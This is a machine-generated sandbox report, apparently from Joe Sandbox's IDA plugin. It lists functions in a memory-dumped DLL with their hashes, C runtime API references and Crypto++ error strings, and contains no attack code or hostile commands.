Instruction ID: fe9af883f6c0f4fa6b4c23db27e4560c4ae5639122e56734f815e89bf8359206
Opcode Fuzzy Hash: fc7e9bbbd8b044730d078ed8f07483789293e9bfbed53ae7e5cd2e1f9207ad40
Instruction Fuzzy Hash: CC01E1B181031C7FDB04DFA8D8559DE77B8AF55344F5089A9F909AF184EB30A604CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DF03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6F8DF047

Part of subcall function 6F8DEAE6: __getptd_noexit.LIBCMT ref: 6F8DEAE9
Part of subcall function 6F8DEAE6: __amsg_exit.LIBCMT ref: 6F8DEAF6

__amsg_exit.LIBCMT ref: 6F8DF067
__lock.LIBCMT ref: 6F8DF077
InterlockedDecrement.KERNEL32(?), ref: 6F8DF094
InterlockedIncrement.KERNEL32(08071658), ref: 6F8DF0BF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 69846a4d04d987ce38053024ef6c9d79ab66000f711d26bfebe39b56c00d8433
Instruction ID: 8fb76b34f53429d452849d38e5272b8d97536530822a86a0c0aedb7dfa9faac7
Opcode Fuzzy Hash: 69846a4d04d987ce38053024ef6c9d79ab66000f711d26bfebe39b56c00d8433
Instruction Fuzzy Hash: A601C431906B15BBDF14DB698401B9E7764BF12764F1008C6F810AF2C0CB34AC91DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DF7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6F8DF7C8

Part of subcall function 6F8DEAE6: __getptd_noexit.LIBCMT ref: 6F8DEAE9
Part of subcall function 6F8DEAE6: __amsg_exit.LIBCMT ref: 6F8DEAF6

__getptd.LIBCMT ref: 6F8DF7DF
__amsg_exit.LIBCMT ref: 6F8DF7ED
__lock.LIBCMT ref: 6F8DF7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6F8DF811

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 297dc53079695d5629c3baf1d633c90ad5e918b9167c02d0464727eedef67bb4
Instruction ID: 9bd303585d8e550665ab800ebd38f02996b277d06f114ac6763b394797af2094
Opcode Fuzzy Hash: 297dc53079695d5629c3baf1d633c90ad5e918b9167c02d0464727eedef67bb4
Instruction Fuzzy Hash: E3F0BB32944709BBE724A77C9802B8D77A07F1172CF104DC9F5145F2C0DF245540EA65

Uniqueness

Uniqueness Score: -1.00%

Function 6F8BE6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6F8BE76F
_memcpy_s.LIBCMT ref: 6F8BE78B

Strings

, xrefs: 6F8BE85A

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: 99b2d6da9617f5b417019f45b337cfb214fb00eb41167d40e1ccdb440f13b10b
Instruction ID: 4d6abd1ce87828da6c40fca121653e299da069432300f4da8dc81fb18b33a42b
Opcode Fuzzy Hash: 99b2d6da9617f5b417019f45b337cfb214fb00eb41167d40e1ccdb440f13b10b
Instruction Fuzzy Hash: 7BC15A756083068FE718CE28C89466AB7E5FFC9314F044EADE496CB354E771EA49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D8B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6F8D8C40
_memset.LIBCMT ref: 6F8D8C56
_memmove.LIBCMT ref: 6F8D8DA8

Strings

EncodingParameters, xrefs: 6F8D8CD6

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
Opcode ID: 650015802072a999f38e021c0dacbc57246ef562ba156aa8055bb4723f60b61f
Instruction ID: b9049692b362acfa71598609f31627fdcce841cf2f4a3815d5d3242215eeda0d
Opcode Fuzzy Hash: 650015802072a999f38e021c0dacbc57246ef562ba156aa8055bb4723f60b61f
Instruction Fuzzy Hash: 4591577460C381AFD704CF28C880B5BBBE5AF9A744F14499DF8988B391D771E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F8B1200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 6F8CD820: _memmove.LIBCMT ref: 6F8CD930

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8B13D4

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Part of subcall function 6F8A8D80: _malloc.LIBCMT ref: 6F8A8D8A
Part of subcall function 6F8A8D80: _malloc.LIBCMT ref: 6F8A8DAF

Strings

: ciphertext length of , xrefs: 6F8B12E4
doesn't match the required length of , xrefs: 6F8B1316
for this key, xrefs: 6F8B1348

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: doesn't match the required length of $ for this key$: ciphertext length of
API String ID: 1025790555-2559040249
Opcode ID: 6900d787e68f4898aae2df02e23da433e56b7245376878c59ec743ee40f076cb
Instruction ID: e50232476138a611cc6f1996122329fcc93fb0da5467d7c40acad86acc8dd108
Opcode Fuzzy Hash: 6900d787e68f4898aae2df02e23da433e56b7245376878c59ec743ee40f076cb
Instruction Fuzzy Hash: 0EA14F71508780AFD324DB68C840B9FB7E9AFD9304F044E5DE1998B391DB31A909CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DB47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6F8DB50D

Part of subcall function 6F8E1AA0: __87except.LIBCMT ref: 6F8E1ADB

Strings

pow, xrefs: 6F8DB4E5, 6F8DB502

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 8ef0462f5f4e33c1c8971428a3b5b0269b7b7be4a1d1ff106e6627986e6716a7
Instruction ID: 47d2a5cc8c53b2196684c0971c144f741b97177b19e135d10d1b2e367836a7b1
Opcode Fuzzy Hash: 8ef0462f5f4e33c1c8971428a3b5b0269b7b7be4a1d1ff106e6627986e6716a7
Instruction Fuzzy Hash: 49518E71A0CE0996C705AB28C9407AE3BB4DF43760F208DD9F4E48E2D8EF349495CA46

Uniqueness

Uniqueness Score: -1.00%

Function 6F888560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6F8888ED

Part of subcall function 6F8DA116: __mbstowcs_s_l.LIBCMT ref: 6F8DA12C

__cftoe.LIBCMT ref: 6F888911

Strings

zX, xrefs: 6F88865E
P, xrefs: 6F888841

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: f338080554238899737c84bc8ea1e3b7aa1868f6b68158da4ab7cc2846eb72c0
Instruction ID: 8b775bf5fbd06beb7940b1b8b2da936742e4b42f9a6db261bc5841e4e790fbce
Opcode Fuzzy Hash: f338080554238899737c84bc8ea1e3b7aa1868f6b68158da4ab7cc2846eb72c0
Instruction Fuzzy Hash: 21910FB11087819FD376CF18C881BABBBE8FB84714F504E1DE1A94B280EB716645CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A89D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F8A8ABB
__CxxThrowException@8.LIBCMT ref: 6F8A8B82

Strings

PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6F8A8A8E
: invalid ciphertext, xrefs: 6F8A8B48

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: cee6dcc8f11d57035818b151fa55632480f40a0ea5cf1a982936ce670a336a9e
Instruction ID: 737e9b8181e6d7d1c2a25570fab625cbe7d30f92917d67e2bc758ed95db43fa8
Opcode Fuzzy Hash: cee6dcc8f11d57035818b151fa55632480f40a0ea5cf1a982936ce670a336a9e
Instruction Fuzzy Hash: D4511F75108780AFD324CF58C990EABB7E8EF89704F004E5DE59687691EB31F909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A6B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8A6BA6

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F874067
Part of subcall function 6F874010: _memmove.LIBCMT ref: 6F8740C8

__CxxThrowException@8.LIBCMT ref: 6F8A6C56

Strings

NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6F8A6B33
RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6F8A6BE3

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1902190269-184618050
Opcode ID: 9ed83790509d0639b8b19936406f2afbac61b463a1423d6fcbe34b20ac86783e
Instruction ID: e00636bff507c4528cb3322140f0f5427ebb67bc73440278f25242c60516d33b
Opcode Fuzzy Hash: 9ed83790509d0639b8b19936406f2afbac61b463a1423d6fcbe34b20ac86783e
Instruction Fuzzy Hash: 055145B1108380AFC300DF28C980A5BFBE8BBDA764F504E6EF1A58B294D774D548CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6F874E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F874EFC
std::_Xinvalid_argument.LIBCPMT ref: 6F874F16
_memmove.LIBCMT ref: 6F874F6C

Part of subcall function 6F874D90: std::_Xinvalid_argument.LIBCPMT ref: 6F874DA9
Part of subcall function 6F874D90: std::_Xinvalid_argument.LIBCPMT ref: 6F874DCA
Part of subcall function 6F874D90: std::_Xinvalid_argument.LIBCPMT ref: 6F874DE5
Part of subcall function 6F874D90: _memmove.LIBCMT ref: 6F874E4D

Strings

string too long, xrefs: 6F874EF7, 6F874F11

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 37590be4f6cc633c93e6037da3e55b32f988f70b16b073d109ef14241bf20bb8
Instruction ID: 57e4ffaf977eb90e992009b93cb26f92bcaa8bf8cec13dbd0d090378fd814392
Opcode Fuzzy Hash: 37590be4f6cc633c93e6037da3e55b32f988f70b16b073d109ef14241bf20bb8
Instruction Fuzzy Hash: 1F31A432310650DBD7349E5CA890B6EF7EAFFE1630B204D6FE5958F681CB71A84487A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F872090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F87211F

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F874067
Part of subcall function 6F874010: _memmove.LIBCMT ref: 6F8740C8

__CxxThrowException@8.LIBCMT ref: 6F8721BF

Strings

PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6F8720BD
PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6F87215D

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 1902190269-1268710280
Opcode ID: 7a403efed1fc024b811c32557fa6124af268b7ee9030c4212db1060b775fed5c
Instruction ID: 5f85cd6eb5dad33c61bb1bf1d0c1e2f23250dc2c4f52d0039929374087203be0
Opcode Fuzzy Hash: 7a403efed1fc024b811c32557fa6124af268b7ee9030c4212db1060b775fed5c
Instruction Fuzzy Hash: 05412B70C0528CFEDB14DFE8D890BDDFBB8BB19354F5046AAE421AB691DB745608CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F871D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F871DC9

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F874067
Part of subcall function 6F874010: _memmove.LIBCMT ref: 6F8740C8

__CxxThrowException@8.LIBCMT ref: 6F871E74

Strings

CryptoMaterial: this object contains invalid values, xrefs: 6F871E16
BufferedTransformation: this object is not attachable, xrefs: 6F871D67

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 1902190269-3853263434
Opcode ID: 718fc7af1b5998bb146aab0f703b7b0cdf742ab95962801e66f1ea134985896c
Instruction ID: 0331a4261082ce533706d3964228f3436c205f39f9e3a8295e38e523dcf96c9c
Opcode Fuzzy Hash: 718fc7af1b5998bb146aab0f703b7b0cdf742ab95962801e66f1ea134985896c
Instruction Fuzzy Hash: 5A414D70C05248FEDB14DFA8D890BDDFBB8BF59354F1086AAE425AB391DB345608CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A74C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6F8CD820: _memmove.LIBCMT ref: 6F8CD930

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8A761A

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

byte digest to , xrefs: 6F8A7565
bytes, xrefs: 6F8A7594
HashTransformation: can't truncate a , xrefs: 6F8A7552

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
